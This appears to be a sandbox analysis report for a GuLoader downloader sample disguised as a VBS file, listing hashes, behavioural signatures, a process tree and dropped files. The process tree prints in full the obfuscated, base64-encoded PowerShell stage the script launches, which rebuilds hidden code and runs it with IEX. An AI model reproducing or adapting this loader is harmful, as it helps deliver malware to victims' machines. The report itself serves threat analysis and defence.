guloader | 750e245126f7e5d858adfb3729e644113a8ef7469bb8fbc9488701066e46bf03

General

Target

PCB_PS_HBPP_(-)_R_5P.vbs
Size

306KB
MD5

8d2b1ef675ffad502437b51b634930cc
SHA1

d60eab25d80525aec88391735c6b6dfcba07156b
SHA256

750e245126f7e5d858adfb3729e644113a8ef7469bb8fbc9488701066e46bf03
SHA512

84853da3aa87c371dd552e320fba1b95d48537d234766c5e6beb4205b60f58babbe84fa6b6641713baec0f6e54ddcde9db72ee96c0dcdafca5f5b989ad2ad773
SSDEEP

3072:5uJW78Xwd4V36VSNa9Xo6l2w1X3GYNWQTX+0GI96MNCkz4BCtQMxeUT8NV/Bg7C+:IJ88u9cw1XvC0GBlBCt7yVW7C+

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
888	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	888	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 888	1996	WScript.exe	28
PID 1996 wrote to memory of 888	1996	WScript.exe	28
PID 1996 wrote to memory of 888	1996	WScript.exe	28
PID 1996 wrote to memory of 888	1996	WScript.exe	28
PID 888 wrote to memory of 820	888	powershell.exe	30
PID 888 wrote to memory of 820	888	powershell.exe	30
PID 888 wrote to memory of 820	888	powershell.exe	30
PID 888 wrote to memory of 820	888	powershell.exe	30
PID 820 wrote to memory of 1732	820	csc.exe	31
PID 820 wrote to memory of 1732	820	csc.exe	31
PID 820 wrote to memory of 1732	820	csc.exe	31
PID 820 wrote to memory of 1732	820	csc.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PCB_PS_HBPP_(-)_R_5P.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABDAG8AdQBuAHQAZQByACAAPQAgAEAAJwANAAoAUwBpACQATwB2AFYATgBhAGEARQBhAGwAQgB1AGUAQwBhAGQATgBhAGkAVQBuAGMAQQBuAHQASABpADkAQQBuACAATQBlAD0AUwBlACAAUgB5ACIAVABlAFYASwByAGkAQQBuAHIAUwBwAHQASwBvAHUAQQB0AGEAVABlAGwASQBtAEEAQQB2AGwATAB5AGwAUABvAG8ATwBwAGMAVQBuACIACgBCAGwAQQBDAG8AZABCAGkAZABLAGkALQBSAGEAVABVAG4AeQBEAGEAcABTAGEAZQBUAGkAIABGAGEALQBVAG4AVABGAHIAeQBwAGkAcABQAGUAZQBVAG4ARABIAHkAZQBQAHMAZgBtAGEAaQBCAGEAbgBXAGUAaQBIAGEAdABVAG4AaQBJAHMAbwBVAHIAbgBGAHIAIABuAGUAQABGAGkAIgAKAGYAaQB1AFUAdgBzAEcAZQBpAFMAdABuAEEAbgBnAHQAcgAgAHMAdQBTAFUAaQB5AEMAbABzAFMAdAB0AFUAbgBlAFMAbgBtAE0AYQA7AAoAVQBvAHUAUABpAHMAUwBvAGkASABpAG4ASwB2AGcAUwBuACAAdQBuAFMAaAB5AHkAQQBtAHMAUAByAHQAZQBtAGUAQwBhAG0ATgBvAC4AcgBkAFIAVwBvAHUAUgBlAG4ARwBlAHQARQBhAGkAZgBvAG0AQwBpAGUAUABsAC4ASwBhAEkARgBlAG4ARgBvAHQAUABsAGUARABlAHIAQgB5AG8AYQBmAHAAUwBhAFMAQwBvAGUASwB1AHIAQQBjAHYASgBvAGkAQwBpAGMAVABlAGUAVABhAHMARgBhADsACgBrAGEAcABQAHIAdQBDAHkAYgBMAHUAbABTAHQAaQBTAGEAYwBUAHYAIABTAGEAcwBuAGEAdABSAGUAYQBGAHIAdABLAG8AaQBwAHIAYwBBAHYAIABNAGUAYwBCAG4AbABvAHYAYQBUAGUAcwBKAHUAcwB2AGUAIABHAHUAQgBUAHIAZQBQAGkAcwBLAG8AbABSAGUAdQBTAHAAdABEAGEAcgBTAHAAZQBCAGUAMQBBAGQAOQBGAG8ANgBTAHAAMQAKAGEAZgB7AEEAdgBbAEIAcgBEAFMAYQBsAGMAbwBsAEkAbQBJAFMAYwBtAFMAcABwAEEAZgBvAG0AdQByAFAAcgB0AE4AYQAoAFkAZQAiAEsAYQBnAE0AZQBkAFAAcgBpAGcAaQAzAEkAbgAyAGcAcgAiAFUAbgApAFMAbgBdAFMAbgBwAEwAaQB1AFQAaABiAE4AdQBsAFAAcgBpAEIAbwBjAE0AdQAgAFQAcgBzAEYAbwB0AFAAZQBhAFQAaQB0AFAAZQBpAFMAcABjAEsAdgAgAFMAdQBlAGsAYQB4AEIAbAB0AEsAbwBlAFAAaQByAFAAeQBuAEwAZQAgAHMAaQBpAE8AdQBuAEMAaAB0AFMAaAAgAGoAbwBTAFAAYQBlAE4AeQB0AEkAbgBEAFMAdgBJAEwAdQBCAEIAbABDAFUAbgBvAE4AaQBsAFAAYQBvAFUAbAByAEgAYQBUAFMAbABhAE8AcABiAEcAcgBsAFMAdABlAFMAawAoAEsAbABpAHAAZQBuAHMAbAB0AFQAaQAgAGYAbwBWAEYAbABhAGUAYwBjAE0AYQBhAEEAcgAsAFMAawBpAFUAbgBuAFAAdQB0AFMAYgAgAEgAZQBuAEQAZQBvAEYAbwBuAEwAaQB1AEMAYQBuAGEAbQBpAFYAaQAsAGMAYQBpAFAAbwBuAEgAZQB0AEQAbwAgAHIAZQBUAG0AbwBpAFQAZQBsAEsAYQBmAGIAcgBsAFMAdAAsAEsAYQBpAFIAZQBuAFAAbwB0AEEAcgAgAGsAbwBWAEoAbwBlAFMAbQBsAEwAYQA4AEsAdQA5AE8AZAApAEkAbgA7AAoAVQByAFsAUwB5AEQATwByAGwAQwBvAGwATABvAEkAVQBuAG0AQwBvAHAAUwBwAG8ATQBvAHIAUgB1AHQAQwB1ACgARgByACIAQgBsAEEAUAByAEQAUwBlAFYATABzAEEATQBhAFAAUABsAEkAUAByADMASwBlADIAcgBlAC4AbABlAEQASgBvAEwAQQBtAEwAQgBvACIAUwBsACkAQgBpAF0AQwBvAHAAQQBuAHUATABvAGIAQQBwAGwASABlAGkATwB1AGMAVQBuACAARABlAHMAQgBlAHQAUwB1AGEATwBmAHQAVQBuAGkAVAByAGMAVQBuACAAVQBkAGUAUgBlAHgAQQBsAHQASwBlAGUAUABpAHIAQQBmAG4ASQBuACAAdAB1AGkAVgBpAG4AQQB1AHQARwBvACAATABpAEcAYQBsAGUATwB2AHQASwBhAFMAdgBhAGkAUAB0AGQASABvAEwARwB5AGUATwByAG4AUgBvAGcAdgBhAHQAUgBhAGgATgBhAFIAZQBwAGUASABvAHEATQBlAHUAbgBpAGkARABhAHIAQwB5AGUAUwBlAGQARgBvACgAdgBpAGkAQQBnAG4AVABqAHQAUwBjACAASABlAEgAUABvAGkATABlAGQATQBhAGUATQBvAGIAUgB5ACkARABpADsACgBDAHIAWwBDAGEARABFAHUAbABCAGwAbABTAHEASQBQAHIAbQBjAG8AcABTAHkAbwBJAG4AcgBzAGkAdABUAGEAKABGAGwAIgBRAHUAdQBhAGwAcwBBAHQAZQBUAG8AcgBtAGkAMwBUAGkAMgBDAGgAIgBBAG4AKQBuAG8AXQBTAGMAcABGAGwAdQBTAG8AYgBIAGUAbABNAGkAaQBhAGEAYwBVAGQAIABFAGsAcwBJAG4AdABNAGEAYQBTAHkAdABhAGYAaQBDAGUAYwBKAGUAIABIAGEAZQBLAGEAeABBAGYAdABiAHIAZQBIAGUAcgBHAGEAbgBLAGEAIABVAHMAaQBDAGgAbgBHAGUAdABEAGkAIAB0AGkARwBGAGwAZQBLAHUAdABJAG4ASwBTAHQAQgBDAGUAQwBWAG8AbwBJAHIAZABGAHIAZQBBAGwAUABhAG4AYQBNAGEAZwBGAHIAZQBCAGUAKABNAG8AKQBVAG4AOwAKAEsAcgBbAEEAcgBEAFMAdQBsAE0AaQBsAFYAcgBJAFUAbgBtAEwAYQBwAEsAbwBvAFMAawByAEIAZQB0AEIAbwAoAGcAbAAiAEYAbABjAEQAaQBvAEIAbABtAFQAdwBkAEMAbwBsAFYAaQBnAEMAZQAzAEIAagAyAFYAYQAuAEgAZQBkAFUAZABsAEQAaQBsAHIAaQAiAFMAaQApAFYAaQBdAGQAdQBwAFAAbAB1AEEAbgBiAFMAbgBsAEkAbgBpAFMAdABjAEgAZQAgAFAAcwBzAEsAbwB0AFUAcABhAFMAdAB0AFUAcABpAFUAbgBjAHMAZQAgAEMAZQBlAFAAcgB4AFUAZgB0AE4AbwBlAEgAYQByAFIAZQBuAFMAZQAgAFQAaQBpAE0AYQBuAEsAbwB0AFQAagAgAEMAbwBQAFAAZQByAEgAdQBpAEcAbABuAFAAbwB0AFMAbABEAEYAdQBsAFQAdgBnAEIAZQAoAE0AaQBpAEYAbABuAEIAZQB0AFAAcgAgAGgAdQBIAEEAbgBlAEIAeQBtAE0AYQApAEMAbwA7AAoAQQBkAFsATABpAEQAUABhAGwARQBnAGwAUwBnAEkATQBpAG0ASwBvAHAAcwBpAG8AUQB1AHIAQQBmAHQAUgBlACgAVQBuACIARQBuAHUAUwBwAHMAUwBrAGUATQBlAHIAQgBsADMARQBuADIAQgBvACIAdAB5ACwAUwB5ACAAcwBwAEUAVQByAG4ATgBvAHQATQBhAHIARQBsAHkAUwB1AFAATwB4AG8AQwBpAGkATgBlAG4AUABhAHQARwBvAD0AVABhACIAVwBoAEUARwByAG4AQgByAHUARQBzAG0AVABhAFcARgBvAGkARABvAG4ARABlAGQARQBsAG8AawBvAHcARQBuAHMAUABlACIARABlACkASwBvAF0AUwBsAHAARgBsAHUAVABhAGIAcwBoAGwAUgBlAGkAUwB0AGMARgBvACAATABpAHMAUgBhAHQARAB2AGEARABlAHQATwBjAGkARgBvAGMAUABvACAAUABuAGUAQwB5AHgAQwBoAHQAQQByAGUASwByAHIATABhAG4AQQBtACAARwBsAEkASwBhAG4AbQBpAHQAVQBuAFAAQQByAHQAUwBpAHIARQBmACAAQQBiAFYARwBlAGkAUgBlAHQARgBsAHIASwByAHUAUABlAHMARgBhAGEATgBvADMAVAB1ADIAQgBhACgAUwB1AHUARABlAGkAVAByAG4AawBhAHQAUABlACAAUwBrAFYATAB5AGEARgBpAGwAVABoAGUAVgBhAGQATQBhAGkAQwBoAGMATQBlAHQAcABhADUARABlACwARwBnAGkAUAB1AG4AUgBlAHQATQBlACAARABvAFYARQB4AGEAVgBpAGwAVAByAGUAYwBoAGQAUwBrAGkAVQBuAGMAcwB1AHQAUwBvADYAWgBvACkASAB5ADsACgBUAHIAWwBSAGUARABNAGUAbABmAG8AbABSAGUASQBSAGkAbQBTAHQAcABOAHkAbwBLAGEAcgBBAGwAdABFAHYAKABEAGkAIgBTAGwAawBNAHUAZQBIAHkAcgBCAHIAbgBTAHQAZQBTAGsAbABTAHQAMwBGAGEAMgBEAGkAIgBTAGEAKQBUAGgAXQBSAGUAcABEAGUAdQBsAGEAYgBSAGkAbABPAHUAaQBEAHIAYwBDAGgAIABGAGwAcwBMAGUAdABDAHUAYQBRAHUAdABCAGkAaQBTAHQAYwBaAG8AIABBAG0AZQBLAGwAeABzAHUAdABGAGwAZQBHAGUAcgBLAGEAbgBJAG0AIABUAHIAdgBMAGEAbwBOAG8AaQBGAG8AZABTAHQAIABIAGUAUgBWAGUAdABIAGoAbABTAG0ATQBEAGkAbwBlAHAAdgBQAHIAZQBtAG8ATQBDAGUAZQBDAGgAbQBQAGEAbwBwAGEAcgBVAG4AeQBVAGEAKABIAHYASQBTAGwAbgBkAHIAdABLAG8AUABCAGUAdABvAHgAcgBUAGUAIABFAGYAVgBIAGEAYQBTAGYAbABVAG4AZQBUAHkAZABCAGUAaQBUAHIAYwBQAHIAdABDAGgAMQBWAGkALABCAGkAcgBBAGwAZQBBAGYAZgBGAG8AIABGAG8ASQBQAGUAbgBGAG8AdABDAGwAMwBDAGEAMgBIAGEAIABHAGEAVgBFAHQAYQBGAG8AbABEAGkAZQBLAG4AZABLAG8AaQBBAHIAYwBVAG4AdABNAGEAMgBIAGEALABCAHYAaQBNAHUAbgBDAHIAdABCAHIAIABiAG8AVgBsAGkAYQBDAG8AbAB1AG4AZQByAGUAZABPAHIAaQBTAGUAYwBLAG8AdABTAG0AMwBHAG8AKQBCAGUAOwAKAGMAbwBbAFIAZQBEAGcAbABsAFQAeQBsAHMAYQBJAFYAYQBtAEQAYQBwAFoAZQBvAEYAcgByAE8AdQB0AEUAZgAoAE8AcgAiAFkAbwB1AEsAbwBzAFAAYQBlAEUAeAByAFMAYwAzAEsAdgAyAFMAcAAiAE0AYQApAEMAaABdAEIAZQBwAGEAbgB1AFIAZQBiAHQAaABsAEIAcgBpAEQAZQBjAFcAYQAgAEIAeQBzAEEAYgB0AEUAbgBhAEYAbwB0AE0AZQBpAEYAbwBjAEgAeQAgAHQAZQBlAEEAYwB4AE0AYQB0AE0AYQBlAFUAZAByAFMAdQBuAEIAZQAgAFIAZQBpAEgAagBuAEUAagB0AGEAZgAgAEgAbwBVAE4AeQBuAFQAagBoAFQAYQBvAEgAeQBvAEQAaQBrAEYAaQBXAGQAZQBpAGQAaQBuAEYAbwBkAEIAYQBvAFQAdwB3AEgAawBzAFQAcgBIAFMAcABvAEMAbwBvAFUAbgBrAGEAYgAoAEsAZQBpAFMAdABuAE0AdQB0AFMAaAAgAFMAawBSAEsAYQBhAHUAYgBhAGEAcgBiAEYAdQBhAE8AdQAsAEoAaQBpAEkAbABuAE0AYQB0AEEAZwAgAFAAZQBMAFMAYQBhAFMAZQBnAGcAZQByAEcAYQBpAEYAbwApAFMAbAA7AAoARQB4AFsAZgBlAEQAUABqAGwAawBhAGwASABhAEkASwBsAG0AdQBuAHAAVwBhAG8ATABpAHIAUwB1AHQATQBzACgASABlACIASABhAGsASgBvAGUAdwBoAHIARwBhAG4ARQBwAGUARwBhAGwAUwBjADMARABlADIAVABlACIAVwBpACwASwBhACAAQQBwAEUASAB2AG4ATQBlAHQAVQB2AHIAQwByAHkATwB2AFAASABvAG8AUAByAGkAVwBhAG4AUAByAHQASwBlAD0AUwBtACIARABlACQAVABhAFYATgBpAGEAQQB4AGwAQwBoAGUAUABhAGQAVQBuAGkAQgByAGMAQQB5AHQAVABlADkAQQBtACIASwB1ACkARAByAF0ARAByAHAAVABpAHUAQQBmAGIAVABoAGwAQgBhAGkAUABsAGMARQBuACAAUABsAHMAUgBlAHQARwByAGEAYQBzAHQARgBvAGkAcwB0AGMAVQBuACAAYgBvAGUAUwBvAHgAUwB1AHQASAB1AGUAUABlAHIAVQBuAG4AQwB1ACAASwBsAGkAQwByAG4ASwBvAHQAVABvACAAVQBuAFQATgBvAEUATwB1AEwAQQBkAE8AcwBwACgAcABsAGkARwBlAG4AUgBlAHQAdABpACAARABpAEIAQQByAGUATgB5AHMAVwBlAGwASQB2AHUARQBnAHQAQwBoAHIAdAByAGUAbwBwADEARgBpADkAQgBvADYAQwBvADYARABlACwAQwBlACAASwBvAGkASwBhAG4AZwByAHQARgBvACAAQwBhAEUAQwB1AHIATgBvAGwARgBvAGkAUwBrAG4AQgByACwAUgB2AGkARQBwAG4ARgBpAHQAUABhACAATQBnAFYAYwBhAGEAUABvAGwAcgBlAGUAUABsAGQAVwBoAGkAQQBwAGMAUwBhAHQAUwB2ACwASwBvACAASABhAGkASwBvAG4AQQBmAHQAQgB1ACAAUABvAEIAUABsAGUATwB1AHMAUwBlAGwAVQBuAHUAUgBlAHQARgBlAHIAQwBoAGUAUgBhADEAVABlADkATwB2ADYASABhACkAUwBuADsACgBUAHIAfQAKAE4AaQAiAEEAcgBAAAoAVQBsACQAVQBuAEIAUgB2AGUAQgBhAHMAVAByAGwAUABhAHUAYQBuAHQAQgBvAHIAcwBuAGUAUwBlADEARgBqADkAUgBvADYAVgBvADMATwBsAD0AdQBkAFsAVQBuAEIARgBvAGUASwBhAHMASABvAGwAVQBuAHUATgB1AHQAQQBkAHIARgBvAGUAQgBlADEAUwB1ADkASQBvADYAUQB1ADEASwByAF0ASABlADoAQQBuADoATQBlAFQASQBvAEUAVQBuAEwAQgBlAE8AUwB1ACgASABhADAAUwB5ACwAUABhADEARwBhADAASABlADQAcwBuADgATwByADUAUwBrADcAVwBoADYATgBpACwAVAByADEARgBvADIAcgBlADIAUgB1ADgAQwBvADgATgBvACwAQQB3ADYAQwBpADQAVQBhACkACgBSAGgAJABGAGoARgBQAHIAaQBUAHIAZwBQAHIAdQBJAG4APQBLAG4AKABTAHkARwBTAHYAZQBJAG4AdAByAGUALQB0AGUASQBnAGwAdABHAGEAZQBDAG8AbQBLAG8AUABCAHUAcgBTAGsAbwBwAGUAcABJAG4AZQBOAG8AcgBEAGEAdABPAGMAeQBaAGkAIABFAHMALQBQAGwAUABHAGUAYQByAGUAdABIAGUAaABGAGEAIABTAHkAIgBCAGkASABQAGgASwBEAGEAQwBDAG8AVQBQAGkAOgBvAHAAXABOAGEAUwBWAGkAbwBEAHUAZgBTAHYAdABmAGkAdwBQAGUAYQBGAGwAcgBSAGUAZQBTAHcAXABQAG8ATwBIAGEAdABPAHIAdABHAGUAYQBTAGwAcwBDAGkAbABNAGkAYQBjAHIAZwBFAHgAcgBGAG8AIgBWAHIAKQBDAGgALgBIAHkAQgBIAGUAdQBLAG8AcgBCAHIAYQBUAGUAbgBEAGEAbwBCAGUAdgBuAGEAZQAKAFAAZQAkAEMAcgBHAEIAcgBlAFUAdABqAFMAdABzAFYAYQAgAEgAbwA9AFIAZQAgAEQAaQBbAFUAbgBTAEQAZQB5AEsAbwBzAEsAZQB0AFMAZQBlAE0AYQBtAE4AbwAuAEoAZQBCAEEAbgB5AFUAdgB0AEIAbABlAEIAZABbAEwAYQBdAHUAZABdAEkAbgA6AFIAdQA6AFAAYQBDAFYAbwByAHMAaABlAEQAaQBhAFIAZQB0AEQAZQBlAFMAdABJAFAAaABuAEIAdQBzAEQAZQB0AE8AcgBhAEEAcABuAFYAYQBjAEYAdQBlAFMAaAAoAFMAaABbAFQAaABTAE0AYQB5AEQAZQBzAFMAZQB0AGMAdABlAEUAagBtAEIAaQAuAFYAaQBCAEQAYQB5AFAAcgB0AFMAdABlAEIAaQBdAEkAbgAsAFQAdQAkAEsAdQBGAFMAdQBpAEMAdQBnAFUAbgB1AEEAbAAuAFAAcgBMAEQAbwBlAFUAaABuAFUAcgBnAE0AbwB0AEYAcgBoAEIAYQAgAEIAYQAvAFAAZQAgAEEAdgAyAEIAaQApAAoATgBvAEYAQQBuAG8AWABlAHIATwB1ACgATABpACQAQgBhAGkASABhAD0AQgBpADAAQwBvADsATABlACAAQQBhACQATABhAGkASABhACAAQQByAC0ASABvAGwAQgBhAHQAVQBuACAASQBuACQAUwBtAEYAUwBhAGkAQwBoAGcAUABlAHUAUwBsAC4AUwB1AEwAVABhAGUAVABoAG4ARwBpAGcAUgB5AHQAQgBhAGgAdABhADsAUwBvACAAQwBlACQAUwB1AGkAQgByACsAVQBuAD0AQQB0ADIAUgBlACkACgBEAG8AewAKAFIAZQAJAEUAbgAkAEMAaABHAEcAYQBlAEYAdQBqAFAAaQBzAEQAbwBbAEYAaQAkAEQAbgBpAEIAaQAvAE8AYwAyAE8AdgBdAEQAZQAgAEEAaQA9AHAAbwAgAEEAcgBbAGEAdQBjAE0AdQBvAEcAZQBuAEQAYQB2AFAAZQBlAEsAcgByAFUAbgB0AEcAZQBdAFMAbAA6AEUAZgA6AFMAbQBUAFMAdABvAFMAdQBCAEcAdgB5AEIAZQB0AE4AbwBlAFMAdQAoAEkAbgAkAFMAYwBGAEMAYQBpAEgAeQBnAFUAZAB1AEYAYQAuAFUAawBTAHIAcgB1AEsAbwBiAFIAZQBzAFUAbgB0AGQAeQByAFMAdABpAGkAbgBuAEwAaQBnAFcAaQAoAEYAbwAkAFMAbgBpAEQAaQAsAFcAbwAgAEgAYQAyAEIAZQApAEsAcgAsAEUAcQAgAFMAaQAxAGEAZgA2AGgAYQApAAoATQBhAH0ACgBHAGUAZgBVAHMAbwBDAHIAcgBPAHUAKABDAGUAJABPAG4ASABUAHMAaQB0AGUAcwBpAG4AcABNAGYAYQB0AGgAbgBTAHAAaQBMAHQAcwBDAGgAPQBDAG8AMABTAHUAOwBQAHIAIABQAG8AJABtAGEASABFAHAAaQBPAHIAcwBFAGoAcABDAGkAYQBEAHIAbgBWAGsAaQBQAGEAcwBEAGkAIABOAG8ALQBHAGEAbABMAG8AdABQAGUAIABCAHUAJABCAGEARwBzAHQAZQBFAGsAagBTAHQAcwBUAGkALgBSAGUAYwBUAGEAbwBJAG4AdQBIAHUAbgBEAGkAdABJAG4AIABCAG8AOwBGAG8AIABEAGkAJABpAG4ASABhAHAAaQBXAGkAcwBBAHoAcABTAGUAYQBNAGUAbgBHAHIAaQBUAGUAcwBPAHAAKwB3AGgAKwBSAGUAKQAKAEEAcgB7AAoASAB1AAkATgBhAFsARgBpAEIASAB5AGUAQQBmAHMAQQB1AGwAbQBpAHUATQByAHQATQBhAHIATgBvAGUATABpADEATQBlADkAQgBhADYAVQBuADEAVQBuAF0AUgBlADoATQBlADoAUwBoAFIAVAByAHQAVABpAGwARABhAE0AVABpAG8ATwB2AHYAUwB5AGUAVABpAE0AUwB5AGUAQQBsAG0AVABhAG8AUgB1AHIAQgBsAHkAQwBhACgASQBvACQAUwBhAEIAQgBpAGUAQQBkAHMARgBvAGwARABhAHUATQBpAHQAVAB1AHIAUgB1AGUAQgBpADEAaQBuADkAVABhADYASwByADMAUwBrACsAUwBuACQAQgBpAEgATwB2AGkAUwBjAHMAVABhAHAAVgBlAGEAcwB0AG4AQQBsAGkAUAByAHMATwB2ACwAQgBvAFsARwBlAHIASQBuAGUAVQBuAGYAWABhAF0AQQB1ACQAUABpAEcAUwBhAGUAVgBhAGoAdwByAHMASQBuAFsARAB5ACQAVABoAEgAcABvAGkAQQBsAHMASAB5AHAATABlAGEAQwBoAG4AUwB0AGkATQBvAHMASQBuAF0ATwBwACwAQgByADEAUwB1ACkACgBUAGUAfQAKAGMAaABbAFMAbABCAEEAbABlAFQAYQBzAEQAZQBsAEMAZQB1AFQAcgB0AHMAcAByAFMAdQBlAEsAdQAxAEUAcgA5AFIAZQA2AFMAZQAxAHMAZQBdAEYAYQA6AEcAbwA6AEUAbQBWAFIAZQBpAE8AegB0AE8AbQByAEQAcgB1AFQAcgBzAFMAdQBhAFQAcgAzAEcAdQAyAE8AcAAoAFMAbwAkAG8AcABCAFMAbABlAEYAYQBzAFQAZQBsAE0AZQB1AFQAcgB0AEQAZQByAFUAbgBlAHUAbAAxAFQAaQA5AFAAYQA2AFAAdQAzAE8AYQAsAEwAYQAgAFAAdQAwAEcAaQApAFAAcgAjAAoAJwBAAA0ACgANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAyADsAIAAkAGkAIAAtAGwAdAAgACQAQwBvAHUAbgB0AGUAcgAuAEwAZQBuAGcAdABoAC0AMQA7ACAAJABpACsAPQAoADIAKwAxACkAKQANAAoAewANAAoACQANAAoACQAkAFYAYQBsAGUAZABpAGMAdAAgAD0AIAAkAFYAYQBsAGUAZABpAGMAdAAgACsAIAAkAEMAbwB1AG4AdABlAHIALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABDAG8AdQBuAHQAZQByAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAFYAYQBsAGUAZABpAGMAdAAgAD0AIAAkAFYAYQBsAGUAZABpAGMAdAAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAFYAYQBsAGUAZABpAGMAdAANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:888
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dnwchnhx.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:820
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2D2A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2D29.tmp"
      4⤵
      PID:1732

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2D2A.tmp

Filesize
1KB

MD5
128283fbb8d47f677f3c1ed2c45f12ca

SHA1
f4cd6eee6ff26a988ac2743680f5670ca1ed1c5c

SHA256
439c90d89be5c0e132c5261438fd33297c4c9d356f2859d02e4708c14c799a43

SHA512
1e01e73553bdef5a59b1a1c4af25e206cd884ea54f7e583b7bf3f87eb7bd81eb3a137da1c83e3a5b0049c306e4623f07999e506458b4cd8c447502cab92895cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\dnwchnhx.dll

Filesize
4KB

MD5
67f0fcc1e4247ecd6f00d84ef64dfa28

SHA1
e940be5f813c90216248452390375e6f8893edd1

SHA256
b2dfe4eb74cfc9001bf5af3e74a7683f310349fb769f71138615a3e1b76413b4

SHA512
9f086520c97c506bea8476635565674edbd1108d756434e84acdde7da0829f16804449aa4b41ee62f424976ffff97a2e2676ae587f64fec4319d51afaff17d5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\dnwchnhx.pdb

Filesize
7KB

MD5
c5bd8ba0872682c24a1bfe52f31f7ae1

SHA1
0956d731b6a96250e8b37d497521a873d46919d1

SHA256
84d198644fe88cf895c49156e1d0f8fa87961808251f5f1844ab374456ba9f88

SHA512
53594e5e0aa0be9e36fac0dfa6167bcd0843731c8701d3f93b6878e9013370c226317b3729cfb50ff89e9747ac88661240addd71cc09cab3e86753c0e1336282

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2D29.tmp

Filesize
652B

MD5
a2669efc6154c96cb309a01dc4337c42

SHA1
19f7e97b6ff5a5cccbdcf29becb95197fa2d45aa

SHA256
e42c8981e54595c2af0d91116000f905463b867f828be586683ceed748a849a9

SHA512
eb49d0490c5c908521ce0e36306bdb52313f5f55252f07ffc84001b3ce48ed966fd4794e87668d35e9d686a8af63d41d615dbc77dad0c9e4b3fc1852a3895ec9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dnwchnhx.0.cs

Filesize
871B

MD5
cc51e6b2c3d02dde4984144b10b007ef

SHA1
6817347ac6d16f650c1e1578b87e913ed291ba31

SHA256
78940296f2e973be878fa95555098acc6ca8bb892f6e4d869122f21e25138f1b

SHA512
0819a35e90a9880e7dcd106bc0e68d17e1d5754d52750e138ebc974dc9c5e33d583b71632004613dbed3789d971bd1ec48b3340168cb1c425f8b1fcc3b2609f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dnwchnhx.cmdline

Filesize
309B

MD5
a625afc6228db217198207d2e09c24d1

SHA1
c4f3b7ff7ba355b506daec08bd30575fac1e66ef

SHA256
6d4da2d134768b72170f4ad0b2aac90219516644097995844e2d8c03094afee3

SHA512
bd3476aa00fb6f67409bc415157ab7908aea9ffc40e2aa53f866e1f52086076a694374fb4edcb0ed6069431de4ff3b6b3f53a2bd829e33194e423d3c2cc9e18f

Download Submit
memory/888-56-0x0000000073940000-0x0000000073EEB000-memory.dmp

Filesize
5.7MB

Download
memory/888-55-0x0000000075281000-0x0000000075283000-memory.dmp

Filesize
8KB

Download
memory/888-65-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download
memory/888-66-0x0000000073940000-0x0000000073EEB000-memory.dmp

Filesize
5.7MB

Download
memory/888-67-0x00000000050E0000-0x00000000051E0000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing